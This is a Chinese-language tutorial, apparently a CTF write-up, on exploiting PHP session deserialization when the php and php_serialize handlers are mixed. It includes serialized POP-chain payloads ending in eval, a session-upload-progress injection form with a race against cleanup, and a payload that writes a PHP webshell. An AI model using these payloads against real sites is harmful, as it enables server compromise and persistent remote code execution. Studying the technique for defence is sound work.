php中session中的反序列

1、php   键名 ＋ 竖线 ＋ 经过 serialize() 函数反序列处理的值
2、php_binary    键名的长度对应的 ASCII 字符 ＋ 键名 ＋ 经过 serialize() 函数反序列处理的值
3、php_serialize (php>=5.5.4)    经过 serialize() 函数反序列处理的数组

phpinfo.php默认处理方式就是php

 

第一种php的：

ini_set('session.serialize_handler', 'php');
session_start();
$_SESSION['afanti']='test';

生成的session文件      afanti|s:4:"test";

第二种php_binary：

ini_set('session.serialize_handler', 'php_binary');
session_start();
$_SESSION['afanti']='test';

生成的session文件      afantis:4:"test";

第三种php_serialize ：

ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['afanti']='test';

生成的session文件    a:1:{s:6:"afanti";s:4:"test";}

如果脚本中设置的序列化处理器与php.ini设置的不同，或者两个脚本注册session使用的序列化处理器不同，那么就会出现安全问题。
原因是未正确处理\\’|\\’，如果以php_serilize方式存入，比如我们构造出”|” 伪造的序列化值存入，但之后解析又是用的php处理器的话，那么将会反序列化伪造的数据

 举个简单例子，看下session参数配置：

存在index.php和class.php，2个文件所使用的SESSION的引擎不一样，就形成了一个漏洞、
index.php，使用php_serialize来存放session

ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["spoock"]=$_GET["a"];

class.php 

使用php来使用session。这是因为当使用php引擎的时候，php引擎会以|作为作为key和value的分隔符，那么就会将a:1:{s:6:"spoock";s:24:"作为SESSION的key，将O:5:"lemon":1:{s:2:"hi";s:10:"phpinfo();";}作为value，然后进行反序列化，最后就会得到lemon这个类,覆盖h1变量是phpinfo();就会被执行。
这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。

<?php 

ini_set('session.serialize_handler', 'php');
session_start();
var_dump($_SESSION);
class lemon {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }
    
    function __destruct() {
         eval($this->hi);
    }
}
 ?>

exp.php构造payload

<?php 

class lemon
{
    public $hi = 'phpinfo();';
}
$a = new lemon();
echo serialize($a); //O:5:"lemon":1:{s:2:"hi";s:10:"phpinfo();";}

将构造好的payload：|O:5:"lemon":1:{s:2:"hi";s:10:"phpinfo();";} 提交就会生成如下seesion文件。

 

 访问class.php时 var_dump($_SESSION); a:1:{s:6:"spoock";s:44:" 已经当做key了。我构造好的payload当做值了。成功执行了phpino()函数。

小结一下：

1、在存储session时，php_serialize来处理session（默认设置时，看phpinfo页面）

2、使用session时，使用php处理session。

3、什么时候反序列化session对象，记住当使用session_start()函数的时候，就会自动反序列化session文件中的对象。

接下来一道实战：

 class.php 明显是让构造pop链

class foo1{
        public $varr;
        function __construct(){
                $this->varr = "index.php";
        }
        function __destruct(){
                if(file_exists($this->varr)){
                        echo "<br>文件".$this->varr."存在<br>";
                }
                echo "<br>这是foo1的析构函数<br>";
        }
}

class foo2{
        public $varr;
        public $obj;
        function __construct(){
                $this->varr = '1234567890';
                $this->obj = null;
        }
        function __toString(){
                $this->obj->execute();
                return $this->varr;
        }
        function __desctuct(){
                echo "<br>这是foo2的析构函数<br>";
        }
}

class foo3{
        public $varr;
        function execute(){
                eval($this->varr);
        }
        function __desctuct(){
                echo "<br>这是foo3的析构函数<br>";
        }
}

index.php

ini_set('session.serialize_handler', 'php');

require("./class.php");

session_start();
var_dump($_SESSION);

$obj = new foo1();

$obj->varr = "phpinfo.php";

phpinfo页面，这时候知道存储session时是php_serialize. index.php处理session是 php。所以存在反序列化的洞

我们先构造payload:  执行phpinfo函数。 O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:10:"phpinfo();";}}}

<?php 

class foo3{
    public $varr='phpinfo();';
    function execute()
    {
        eval($this->varr);
    }
}
class foo2{
        public $varr;
        public $obj;
        function __construct(){
                $this->varr = '1234567890';
                $this->obj = new foo3();
        }
        function __toString(){
                $this->obj->execute();
                return $this->varr;
        }
}

class foo1{
        public $varr;
        function __construct(){
                $this->varr = new foo2();
        }

}
$a = new foo1();
echo serialize($a); //O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:10:"phpinfo();";}}}

问题来了。我们输入不可控制，怎么注入payload,这个可以参考另一篇我写的文章。

写入的方式主要是利用PHP中Session Upload Progress来进行设置，具体为，在上传文件时，如果POST一个名为PHP_SESSION_UPLOAD_PROGRESS的变量，就可以将filename的值赋值到session中，上传的页面的写法如下，在123的位置注入payload

<form action="index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

怎么进行注入，访问哪个页面会写入session中哪？其实当我们访问网站任意一个网页(保证session是以php_serialize方式存储的都可以)就能将session注入到文件中这里。建立一个index1.php空网页。

构造如下数据包：

生成的session文件内容

访问index.php。因为index.php 有session_start()有反序列化操作，还包含了class.php类，

看我们打印出来的session.因为是php处理的session，a:1:{s:146:"upload_progress_121被当做key。注入的对象当成值，导致注入，成功执行了phpinfo()。

假如cleanup开启是on时，回清空注入的payload。我们可以通过时间竞争来生成shell.

通过burp 如下配置

当开始跑的时候，访问index.php。下面是成功反序列化的结果。当把payload换成 file_put_content('file','<?php eval($_POST['afanti']);?>');访问就能生成shell

 

参考连接：

https://yq.aliyun.com/ziliao/612

http://www.91ri.org/15925.html